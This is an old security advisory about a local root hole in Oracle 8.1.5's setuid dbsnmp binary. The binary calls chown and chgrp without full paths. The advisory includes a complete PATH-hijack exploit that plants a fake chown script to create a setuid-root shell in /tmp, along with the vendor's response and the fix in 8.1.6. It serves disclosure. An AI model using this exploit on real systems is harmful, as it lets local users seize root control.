COMMAND
dbsnmp
SYSTEMS AFFECTED
Oracle 8.1.5 (Only tested in Digital Unix)
PROBLEM
Ismael Briones found following. There is a problem in dbsnmp that
can be used by local users to obtain root privileges. The dbsnmp
is setuid root. When a user execute dbsnmp there is a call to
chown and chgrp, but without especify the path, so any user can
define his PATH variable to exploit this vulnerability. Any user
with local access, can gain root privileges. Exploit:
- export PATH=~/bin/:$PATH
- Then we create the file ~/bin/chown or ~/bin/chgrp:
#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX
(We have to put all in the same line, separated by semicolon)
We make our chown or chgrp executable:
chmod +x ~/bin/chown
chmod +x ~/bin/chgrp
When the user execute dbsnmp, the system look for chown in the
first directory of the PATH variable, execute our chown file and
whe have a shell setuid root in /tmp/XXX.
The Oracle docs go on and say that to check whether or not the
dbsnmp agent is running, login as oracle on the appropriate
server, and run the following:
$ <path to oracle bin>/lsnrctl
LSNRCTL for Solaris: Version 8.1.5.0.0 - Production on 01-AUG-01 15:46:30
(c) Copyright 1998 Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> dbsnmp_status
The db subagent is not started.
SOLUTION
Oracle 8.1.6 is not vulnerable. Vendor was contacted 30/07/2001
and Oracle answer: "We are investigating a fix as we speak."
It's funny to see Oracle's canned response to this. Not 100% sure
this is exactly the same problem, but Aaron C. Newman worked with
them fixing what looks like the same problem back in 1999. They
provided a patch way back then - might be that whoever respond to
you is not "up to speed":
http://oliver.efri.hr/~crv/security/bugs/Others/oracle7.html